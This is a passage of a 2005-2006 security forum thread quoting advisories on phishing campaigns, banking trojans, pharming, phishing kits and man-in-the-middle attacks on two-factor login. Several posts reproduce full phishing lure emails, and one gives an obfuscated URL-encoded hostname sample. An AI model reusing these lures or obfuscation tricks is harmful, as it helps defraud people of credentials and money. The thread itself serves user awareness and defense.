Jump to content


Photo

"Phishing" schemes - New Exploits


  • Please log in to reply
106 replies to this topic

#51 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 14 December 2005 - 06:57 AM

FYI...

Malicious Website / Malicious Code: Fake McAfee Patch
- http://www.websenses...php?AlertID=370
December 13, 2005
"Websense® Security Labs™ has received reports of an email scam disguised as a patch for McAfee products. Users receive a spoofed email message instructing them to click on a link to immediately download and install a patch from McAfee. This patch claims to address a virus that does not exisit. The link in the email takes users to a fraudulent website, that appears to be the legitimate McAfee security site.
The patch hosted on this page is actually a Trojan downloader. The malicious site is hosted in the United States and was online at the time of this alert.

(Malicious site screenshot shown at URL above.)

Also see: http://www.f-secure....5.html#00000733

:(

Edited by apluswebmaster, 14 December 2005 - 07:40 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#52 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 19 December 2005 - 08:44 PM

FYI...

Spyware Lures to Install Potentially Unwanted Software
- http://www.websenses...php?AlertID=379
December 19, 2005
"Websense Security Labs ™ is seeing a large increase in the number of websites and emails that use deception and/or browser vulnerabilities to install potentially unwanted software. The common theme among these threats is the use lures of possible spyware infections on your machine. In some cases, the scam actually reports fraudulent information regarding the security of your PC.
In many cases they also request money in return for cleaning the outlined security problems (we have seen as much as $500 per year). Over the last 2 weeks, we have identified more than 1500 sites that have some (or all) of the following criteria:
- They are hosted in Ukraine and Russia
- The website domain names are registered in countries like Vanuatu and Mexico
- IP netblocks hosting sites are often hosting other questionable sites such as fraudulent search engines
- IP netblocks have been hosting malicious code such as Trojan horse downloaders, droppers, and hosts-file redirection software
- Malicious code that modifies DNS settings has used these netblocks for DNS resolving
- Downloaded code often includes several pieces of spyware, adware, and other potentially unwanted software
- Removing the software often requires that you to fill out a survey
- Several of the sites contain links to other sites that are hosting IE exploit code ..."

(Various Example Screenshots available at URL above.)

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#53 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 09 January 2006 - 07:22 AM

FYI...

Phishers catch eBay users again
- http://www.infomatic...ck-targets-ebay
06 Jan 2006
"Criminals are again targeting eBay members, this time by sending forged auction inquiries from what appears to be the site's 'Question from eBay Member' message portal, according to security experts SpamStopsHere.
Account holders are prompted to respond to the inquiry by clicking the 'Respond Now' button in the email, and are then directed to a fraudulent eBay log-in screen. After the seller has entered their log-in information the fraudsters steal their identity for later use.
Known as 'spear phishing', the attack is distinctive in that it is targeted and focused on one end user or organisation at a time. Spear phishing emails are designed to appear as if they are sent from a trusted individual or company, and typically ask for log-in IDs and passwords. Ted Green, chief executive at SpamStopsHere, said: "We are seeing an evolution in phishing and spear phishing attacks, and the sophistication is constantly increasing. Cyber-criminals are relentless in developing new and ingenious methods of monetary and identity theft."
Ebay members were targeted in a mass phishing campaign before Christmas which represented 96 per cent of all UK phishing attacks in December."

Also: http://castlecops.co..._scam_site.html

:hmmm:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#54 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 11 January 2006 - 05:53 PM

FYI...

Malicious Websites / Malicious Code: When Greyhats turn to Blackhats
- http://www.websenses...php?AlertID=395
January 11, 2006
"Throughout December, Websense Security Labs™ reported a number of cases where browser and Operating System vulnerabilities were being used to install Potentially Unwanted Software onto end-users machines without user-intervention. In several cases, dozens of pieces of code were installed, and often report false information in order to entice the end-user to clean their machine from spyware.
We are now seeing some of those same entities using their exploit code to install more reprehensible crimeware, such as key loggers and phishing traffic redirectors. This code is designed to steal information in addition to the installation of potentially unwanted software.
Users are typically infected through an IFRAME, loaded silently from a compromised website or an advertisement network pop-up. The exploit code loaded through these IFRAME tags attempts to use several dozen vulnerabilities, including the two recent zero-day vulnerabilities: MS05-054 and MS06-001. Users who are patched against these vulnerabilities are displayed an ActiveX prompt to install the exploit code...
Recently, we have seen the downloaded files performing additional functions, including:
- Banking keyloggers
- Trojan horses with root-kit functionality
- Traffic redirectors that direct you to fraudulent Paypal websites
- Trojan horse backdoors
- Internet Explorer process injection ..."

(URL above includes screenshots and code examples...)

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#55 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 23 January 2006 - 08:51 PM

FYI...

Phishing Alert: Yahoo! Account Compromise through Yahoo! IM
- http://www.websenses...php?AlertID=403
January 23, 2006
"Websense® Security LabsTM has received several reports of a new phishing attack that targets Yahoo! customers. Users receive a message through Yahoo! Instant Messenger, enticing them to access a website with "click on this website." Upon clicking on the website, users are forwarded to a fraudulent website, which is hosted in the United States and was up at the time of this alert. It requests their Yahoo! Photos username and password. Once users have entered their username and password, they receive an error message that their email account was incorrect, at which time the account information is forwarded to a third party and the end-users' account information could then be compromised.

(Phishing website screenshot available at URL above.)

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#56 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 10 February 2006 - 07:48 PM

FYI...

Phishing Alert: Adobe
- http://www.websenses...php?AlertID=422
February 10, 2006
"Websense® Security Labs™ has received reports of a new phishing attack, using the brand name of Adobe Systems Incorporated. Users receive a spoofed email that provides a link to the phishing website, which is designed to mimic the Adobe online store. Users are given the option to buy and download Adobe products at substantially discounted rates. The site has links to awards hosted locally, which supposedly prove its veracity. When checking out, the user is prompted for credit card information.

This phishing site is hosted in China and was up at the time of this alert."

(Phishing screenshot available at the URL above.)

:grrr:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#57 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 22 February 2006 - 01:29 PM

FYI...

Antiphishing.org Trend Report
- http://isc.sans.org/...hp?storyid=1141
Last Updated: 2006-02-22 18:00:24 UTC
"In case you've missed it, the Anti-Phishing Working Group have published their latest (December 05) trend report a couple of days ago. Interesting as always. See:
- http://www.antiphish...C2005_FINAL.pdf "


:!:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#58 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 24 February 2006 - 09:04 AM

FYI...

Increased deployment of Phishing Kits
- http://www.websenses...php?AlertID=433
February 23, 2006
"Websense® Security Labs is seeing a significant increase in the number of Phishing kits used to host multiple target brands on a single host and deploy similar attack code on several machines. Currently the most popular is being referred to as the "Rock Phish Kit". The kit appears to have surfaced around November of 2005, but the frequency of its use is growing.
* Sites often use either an IP address or a fraudulent domain name.
* Sites usually have /rock/ or /r/ in the URL path, followed by an alpha character.
* Quite often the letter after the /r/ matches the target name (e.g., ...www.samplerockphish.com/r/b = barclays).
* Sites are usually hosted in Asia.
* Sites use the same PHP script to post the data.
* Sites often use JavaScript tricks to replace the browser toolbar and disable keyboard functions such as Cut and Paste.
...we have included screenshots from a recent site that was hosting 6 target brands.
/a/ -> Alliance & Leicester
/b/ -> Barclays
/c/ -> Citibank
/d/ -> Deutsche Bank
/e/ -> eBay
/h/ -> Halifax ..."

(Screenshots available at the URL above.)

:wtf:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#59 quietman7

quietman7

    quietman7

  • Helper
  • PipPipPipPipPip
  • 680 posts

Posted 25 February 2006 - 07:07 AM

Rootkit Pharming

Haxdoor is one of the most advanced rootkit malware out there. It is a kernel-mode rootkit, but most of its hooks are in user-mode. It actually injects its hooks to the user-mode from the kernel -- which is really unique and kind of bizarre.

So, why doesn't Haxdoor just hook system calls in the kernel? A recent Secure Science paper has a good explanation for this. Haxdoor is used for phishing and pharming attacks against online banks. Pharming, according to Anti-Phishing Working Group (APWG), is an attack that misdirects users to fraudulent sites or proxy servers, typically through DNS hijacking or poisoning.

We took a careful look at Backdoor.Win32.Haxdoor.gh (detection added 31 Jan, 2006). It hooks HTTP functionality, redirects traffic, steals private information, and transmits the stolen data to a web-server controlled by the attacker. Most (all?) online banks use SSL encrypted connections to protect transmissions. If Haxdoor would hook networking functionality in the kernel, it would have hard time phishing since the data would be encrypted. By hooking on a high-enough API level it is able to grab the data before it gets encrypted. Apparently Haxdoor is designed to steal data especially from IE users, and not all tricks it plays work against, for example, Firefox.

f-secure.com/weblog
Microsoft MVP - Consumer Security 2007-2015 MVP.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#60 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 18 March 2006 - 08:10 AM

FYI...

Phishing Alert: Career Builder
- http://www.websenses...php?AlertID=445
March 14, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets members of CareerBuilder.com. Users receive a spoofed email message, which claims that their account information must be verified due to unauthorized access. The message provides a link to a phishing website. Users who visit this website are prompted to enter personal information. This phishing site is hosted in the Republic of Korea and was down at the time of this alert.

Phishing Email:

Dear < e-mail removed >,
We recently noticed one or more attempts to log in to your Careerbuilder account from a different IP address.
If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you. However, if you did not initiate the log ins, please visit Careerbuilder as soon as possible to check-up your account information:
< URL REMOVED >
Thanks for your patience.
Sincerely, Careerbuilder
Please do not reply to this e-mail. Mail sent to this address cannot be answered..."

(Phishing screenshot available at the Websense URL above.)

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#61 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 20 March 2006 - 12:28 PM

FYI...

Malicious Website/Code: Trojan targeting more than 100 banks
- http://www.websenses...php?AlertID=447
March 19, 2006
"Websense® Security Labs™ has received reports of a Trojan Horse which targets users of more than 100 financial institutions in the United States and Europe. Once installed on a user's machine, the malicious code checks to see if there is an active window open (either "my computer" or Internet Explorer). If one of these applications is not open, the malicious code modifies the contents of the hosts file on the local machine with a list of sites all pointing to localhost (127.0.0.1).
If either of these applications is open, the behavior is different. In this case, the malicious code performs a DNS lookup to a DNS server hosted in Russia and receives an address for a website. The address returned from that DNS server is then populated into the hosts file along with a list of target brands. If the target machine visits one of the sites in the list, the machine is redirected to a fraudulent web site on the hosted machine in Russia. This allows the attacker to change the destination address through DNS if one of the servers is taken offline.
The web server uses the hostname received to serve up pages for that particular target. There are more than 100 different phishing brands hosted on this site, all with unique pages for the particular attack.

(Screenshots available at the Websense URL above.)

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#62 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 25 March 2006 - 09:51 PM

Phishing attacks hit record highs...

Per the APWG January report*, there were 17,877 unique phishing reports, and 9,715 unique phishing websites.

* http://www.antiphish...rt_jan_2006.pdf



:huh: :angry: :ninja:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#63 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 29 March 2006 - 04:56 PM

FYI...

Hackers Tap Banks' Web Sites In Unique Phishing Attack
- http://www.techweb.c..._section=700028
March 29, 2006
"In an unusual form of phishing, hackers cracked the computers hosting the Web sites of three Florida banks, redirecting banking customers to a bogus homepage in order to steal account information and other personal data. ElectroNet Intermedia Consulting, the Tallahassee, Fla., service provider that hosts the sites of Capital City Bank, Wakulla Bank and Premier Bank, told the Tallahassee Democrat newspaper that the scam was spotted within an hour after it started March 21, and the sites were shutdown for a short period. The Florida Department of Law Enforcement was investigating the case, and no arrests had been made. Neither the FDLE nor ElectroNet were immediately available for comment. The incident marked a new tactic in phishing, a form of deception in which crooks use spam to lure people to bogus banking sites to enter passwords and other personal information, said John Quarterman, chief executive of Austin, Texas-based, InternetPerils Inc., which tracks Internet scams...
The hackers entered two servers running Microsoft Internet Information Services and planted the script needed to redirect people from the banks' legitimate sites to a bogus one. This new scam is like phishing without the intervening electronic mail step," Quarterman said. "Because it is the bank's own Web (hosted, in this and no doubt many other cases) server that is compromised, the customer has even less reason to suspect anything amiss"..."

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#64 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 05 April 2006 - 02:57 PM

FYI...

Malicious Code: New Trojan Banker Technique
- http://www.websenses...php?AlertID=458
April 05, 2006
"Websense® Security Labs™ has received reports of a Trojan Horse that uses a new technique to steal financial account information. The Trojan monitors Microsoft® Internet Explorer and waits for the user to visit one of a dozen financial websites. Once the user begins the logon process, the Trojan creates a pop-up window to replace the actual logon page. These pop-up windows are customized for each website and designed to spoof the appearance of the legitimate logon page. Account information entered into these pop-up windows is captured and emailed to the attacker.
This Banker Trojan has currently not been assigned a name by any anti-virus vendors..."

(Screenshots are available at the URL above.)


:eek:

Edited by apluswebmaster, 05 April 2006 - 02:58 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#65 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 26 April 2006 - 07:33 AM

FYI...

Phishers Snare Victims With VoIP
- http://www.techweb.c..._section=700028
April 25, 2006
"A security firm on Tuesday reported discovering a phishing scheme in which the scammers used Internet telephony to copy a bank's automated voice system in order to steal customers' passwords, account numbers and other personal information. In the attack that occurred last week, con artists sent spam disguised as coming from a small bank in a large East Coast city, Cloudmark Inc., a messaging security firm, said. The message asked the recipient to dial a telephone number to talk with a bank representative. The number went to an automated voice system that asked for an account number and personal identification number, or PIN, in order to access the caller's finances. The number was obtained through a regular provider of voice over Internet protocol services. There was no indication that the VoIP provider was aware of the scam, said Cloudmark, which declined to name the company and the spoofed bank. The incident reflected a mutation in the tactics used by phishers to snare victims. More traditional schemes involve spam asking the recipient to visit their bank's Web site through a link in the message. At the bogus site, the visitor is asked to input personal information. The latest scheme, however, is the first Cloudmark has seen using Internet telephony..."
- http://www.cloudmark...se=2006-04-25-2

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#66 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 01 May 2006 - 11:33 AM

FYI...

American Express: Beware Phony Log-In Screen
- http://www.eweek.com...,1955288,00.asp?
April 28, 2006
"...In an alert posted online, the New York-based company addd a screenshot of the pop-up, which tries to lure the user into entering name, social security number, mother's maiden name and date of birth. "Please note that this fraudulent activity may be the result of a computer virus and is not a part of the American Express website. If you received this pop-up box, your computer may have this virus," the company warned. Security researchers tracking malicious Internet activity say the fake pop-up is a classic example of a banking Trojan targeting specific financial institutions, even when the user is surfing on a secure, authenticated Web site..."

- http://www10.america...41,24381,00.asp
"As an example of phishing, please note that some of our customers reported receiving the following pop-up screen while logged into our secure site. The pop-up screen is known to be a hoax..."

(Screenshot available at the AMEX URL above.)

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#67 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 18 May 2006 - 04:16 PM

FYI...

Phishers use url encoding to obfuscate hostnames
- http://isc.sans.org/...hp?storyid=1342
Last Updated: 2006-05-18 20:39:00 UTC
"...Some browsers allow URL encoded host names. The impact is similar to the old (no longer working) method of using the "username:password@url" notation. So the impact is not "huge", but its yet another trick in the phishing arsenal.
Theoretically, a host name should only contain letters A-Z, numbers 0-9 and dashes (-). In order to support foreign character sets, "IDN" is used with uses that same set of characters to encode. For domain names, this is enforced by the registrars, but host names for existing domains are up to the user, and DNS servers typically allow "anything" (after all, DNS can be used for other things then host names).
We found that Internet Explorer, Safari and to some extend Opera will accept URL encoded host names and redirect to the "decoded" version. Further, they will allow spaces as part of host names. This is used by phishers to obfuscate URLs.
Explorer and Opera will accept the URL encoded host name, and redirect to it. But once you arrive at the page, the URL bar will show the URL in clear text.
Safari does accept URL encoded host names as well, but will NOT decode it as you arrive at the destination page.
Firefox refuses to use URL encoded host names.

Simple sample to test (not clickable, copy&paste):
http://www.paypal.co...scr%6...d.comor try a host name with space vs. without (less of an issue as you would have to control DNS for the domain to use it)
http://www .securewebbank.com (vs. http://www.securewebbank.com ) URL encoding is only supposed to be used after the host name to encode the file name and the GET parameters.

Suggested defenses:
Inform users about this problem.
Audit DNS caches to see if users asked to resolve such a host name.
Audit proxy logs for such domains, and filter if possible."

.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#68 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 01 June 2006 - 03:41 PM

FYI...

Phishing Alert: MySpace.com / AIM
- http://www.websenses...php?AlertID=504
June 01, 2006
"Websense® Security Labs™ has discovered a phishing attack that attempts to steal the account information of MySpace.com users. A hyperlink is first delivered to victims via AOL Instant Messenger. Users who follow this link are taken to a fraudulent website that spoofs the MySpace.com login page. This page captures their MySpace account information and then forwards the user to the actual MySpace.com website. The fraudulent site also sets a cookie on the victim's computer, which prevents the phishing attack from being displayed on any subsequent visits. The phishing site is located in California and was up at the time of this alert. Screenshot available with full alert.
For additional details and information on how to detect and prevent this type of attack:
* http://www.websenses...php?AlertID=504 ..."

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#69 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 12 June 2006 - 07:13 PM

FYI...

Phishing Alert: FDIC
- http://www.websense....php?AlertID=518
June 12, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of FDIC insured institutions. Customers receive a spoofed email message, which claims that their account is in violation of the Patriot Act, and that FDIC insurance has been removed from their account until their identity can be verified. This message provides a link to a phishing website which prompts users to enter account information to verify their identity. This phishing site is hosted in Hungary and was up at the time of this alert.
Phishing email:
'In cooperation with the Department Of Homeland Security, Federal, State and Local Governments your account has been denied insurance from the Federal Deposit Insurance Corporation due to suspected violations of the Patriot Act'..."

(Screenshots available at the URL above.)

:( :hmmm:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#70 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 16 June 2006 - 12:13 PM

FYI...

Pay Pal Phish Phlaw?
- http://isc.sans.org/...hp?storyid=1422
Last Updated: 2006-06-16 17:05:22 UTC
"We've recieved a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users. The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page. Logging in sends the PayPal username and password to the bad guys and causes another page asking for more information (social security number, credit card number ...) to remove the limits on the access of their account. More to come as we confirm information."
Also:
- http://news.netcraft...tity_theft.html
Jun 16, 2006

EDIT/ADD:
- http://news.com.com/...g=st.util.print
Jun 16 17:16:35 PDT 2006
"...By exploiting the flaw, attackers were able to redirect people from a PayPal Web page to an online trap located in South Korea, a representative for the service said. The page actually has a real PayPal URL, but hosts malicious code that presents a message warning members that their account had been compromised. It then redirects them to a "phishing" Web site. At the malicious, information-thieving Web site, people are asked for their PayPal login information, experts at Netcraft, an Internet monitoring company in England, said in an advisory. Subsequently, the scammers are urged to enter their Social Security number and credit card details, Netcraft said. "As soon as we became aware of this scheme, we changed some of the code on the PayPal Web site. So this scheme, or any scheme like it, can no longer be effective," Amanda Pires, a PayPal spokeswoman, said in an interview..."

:(

Edited by apluswebmaster, 17 June 2006 - 08:21 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#71 quietman7

quietman7

    quietman7

  • Helper
  • PipPipPipPipPip
  • 680 posts

Posted 23 June 2006 - 08:01 AM

New Phishing Explolits Emerge

The Anti-Phishing Working Group (APWG) yesterday released its latest phishing trends report, which shows that the number of different "brands" (organizations) reporting phishing attacks jumped from 97 in April to 137 in May: the most since December, when it was at 121...While phishing is spreading, however, many observers are more worried about the improved quality of attacks than about their quantity. Experts who track the phishing scene say they are seeing a new wave of exploits that go far beyond the old Website-hijacking scams. Keyloggers are among the most sophisticated and fastest-growing types of phishing attacks on the Web...The keylogger's goal: Infect user machines and, ultimately, steal their data and privileges. "There's a shift in using malicious code and exploits to infect users instead of Websites with a simply deceptive tactic...At the same time, phishing toolkits are getting easier to obtain.

darkreading.com
Microsoft MVP - Consumer Security 2007-2015 MVP.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#72 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 05 July 2006 - 10:18 PM

FYI...

Yahoo! user account phishing
- http://isc.sans.org/...hp?storyid=1463
Last Updated: 2006-07-06 00:10:23 UTC
"...The web site, which you can see*... is actually hosted on Geocities. The URL will immediately alert any user that knows what he's looking for (and this is why we can not stress enough how important user awareness and education is).
As you can see*... the design is fairly good, and if you don't check the URL, you might be fooled into entering your credentials here. There are couple of issues here about which we wrote recently ( http://isc.sans.org/...hp?storyid=1277 ). While we were looking at bank web sites in the original diary by Johannes, we have a similar problem here. Although the credentials are transferred over the network securely (using SSL), the front web page seems to be plain HTTP. A typical user doesn't know how to check what's happening once he clicks on the "Login" button, so it's very easy to launch phishing attacks like this on them. That's why you should always use SSL on the front web page at least (yes, there are other numerous attacks on this, but let's stick to this subject for this moment).
Back to the phishing web page. Once a user tries to log in, his credentials are sent to a CGI script on a remote site which then (probably) e-mails this to the attacker. The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this."

(* Screenshot available at the ISC URL above.)

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#73 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 10 July 2006 - 04:43 PM

FYI...

Phishing Alert: Google Mail
- http://www.websense....php?AlertID=545
July 10, 2006
"Websense® Security Labs™ has received reports that a variant of Google phishing attacks (discussed in a previous alert*) are increasing in sophistication. Users are shown a spoofed copy of the Gmail login page with a message claiming, "You WON $500.00!" The message states that this prize money will be delivered to an e-Gold, PayPal, StormPay, or MoneyBookers account of their choice. If users select an account, they are informed that this prize money is only available to "premium members" of "Gmail Games." The page states that "Gmail Games" membership requires an $8.60 registration fee, and then asks users to pay the registration fee or forfeit the $500 prize money. Users are directed to an actual payment site to deliver the registration fee. This phishing site is hosted in the United States and was up at the time of this alert.
> Sample Email Lure:
* *You won $500! Gmail congratulates you!* *
CONGRATULATIONS!
YOU WON $500!*
Gmail gives members random cash prizes. Today, your account is randomly selected as the one of 12 top winners accounts who will get cash prizes from us. Please click the link below and follow instructions on our web site. Your money will be paid directly to your e-gold, PayPal, StormPay or MoneyBookers account.
Click here to get your prize:
<URL Removed>
Sincerely,
The Gmail.com staff
Gmail.com ..."

(Screenshot available at the URL above)

* http://www.websense....php?AlertID=332

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#74 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 10 July 2006 - 05:23 PM

FYI...

Phishing Alert: -Fraudulent- "Stop Fraud Now" Program
- http://www.websense....php?AlertID=546
July 10, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of Bank of America and various other banks. Users receive a spoofed email message, which claims that a new security program called SFN (Stop Fraud Now) has been launched. The program claims to provide protection against cloning of credit cards and asks users to provide details, such as Social Security Number, card number, and ATM Personal Identification Number (PIN). The message provides a link to a phishing website that requests users enter their personal information and account details. The phishing site is hosted in Canada and was up at the time of this alert.
> Phishing email:
Bank of America' in collaboration with ALL the banks around the world which offers services of transactions through the internet and not only and several institutions against frauds launched a revolutionary program called SFN (Stop Fraud Now)'.
By registering on SFN your card is protected 99.99%. You probably wonder why we say that the chances of suffering a loss are 0. The moment you register you will receive a code which contains an international unique code (IUC). This code arrives to the bank which your card was released from. This way your card can't be cloned without knowing this code. Only the issuer bank can reproduce your card in case you loose it or has been stolen. Also you have many options from your account. On-line assistance through chat or virtual phoning (skype) non-stop and also the possibility of blocking your account through the push of a button anytime you find anything suspicious about it. You can unblock it as easy after solving the issues. Another helpful option you can find it in the internet Online section. There you have two buttons On-line and Off-line which allows y! ou to keep your card off-line for transactions and to active it only when you wish to shop or make a transaction. We guarantee it's a 100% efficient and secure program and monitored 24 hours a day, 365 days a year.
Click here < LINK REMOVED > to see the list of banks which support SFN program | Click here < LINK REMOVED > to visit our website for more informations!
JOIN NOW FOR MORE PROTECTION!
Your card no longer can be cloned!
Your card is monitored non-stop for a period of 356 days preventing suspicious transactions on the internet but also from the bancomat!
You have free assistance from our team anytime you're unclear about our services!
Once you created your account you can set your card to on-line or off-line for internet transactions! This option offers you 100% ASSURANCE that ONLY YOU are able to use the card for online transactions!
The chances of being a victim of a material loss is 0.01% and in the case supposing our system didn't work at the efficiency we promised, we guarantee 100% that your money will be recovered!
This service is offered by Bank of America in association with European Central Bank and National Australian Bank The project is of federal nature and is protected by the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C).
It is 100% FREE !
For more information about this program visit our website
< URL REMOVED >
Bank of America
Electronic Banking Services
CA4-701-02-75
P.O. Box 37000
San Francisco, CA 94137 ..."


(Phishing Screenshots available at the URL above.)

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#75 quietman7

quietman7

    quietman7

  • Helper
  • PipPipPipPipPip
  • 680 posts

Posted 12 July 2006 - 12:38 PM

Man-in-the-middle phishing

The first ever case of using a man-in-the-middle attack against an online bank was reported by Brian Krebs of Security Fix on Tuesday.

The security industry has long predicted this type of man-in-the-middle attack; it was only a matter of time. The attack targeted Citibank's Citibusiness service and was designed to spoof the token key hardware device used by the bank's customers. The phishing site checked the logon credentials with the real site before rendering the results to the phishing victim. Enter an invalid password, and you got an invalid logon page. A man-in-the-middle attack checks everything done at the phishing site against the original, so everything should look and feel more genuine.

Exactly the same kind of attacks can be used to target other types of two-factor authentication, including one-time password sheets.

f-secure.com/weblog
Microsoft MVP - Consumer Security 2007-2015 MVP.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#76 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 12 July 2006 - 08:02 PM

FYI...

Recent Two factor authentication attacks
- http://isc.sans.org/...hp?storyid=1478
Last Updated: 2006-07-12 23:04:15 UTC
"There has been recent report* of two factor authentication protected websites getting attacked by the man-in-the-middle type of setup where the victim enter information (include the token code) into a look-alike website, this look-alike website immediate uses those credential to login to the actual financial site. Obviously, upon success login by the user, the attacker can immediately execute the fraudalent transaction. While this might sound shocking to the financial industry since we haven't seen too many of these attacks, the theory of the attack and the risk have certainly been well understood within the security community**... Overall, two factor authentication will reduce the risk of attacks by raising the effort of the attacker to compromise the accounts, but it might not have the level of security enhancement that some people believed. In the man-in-the-middle attack, the flaw happens due to the lack of verification of the bank's website by the victim, the victim are simply tricked into yielding credentials to a web site without authentication. This is really outside of the protection zone of the extra authentication factor.
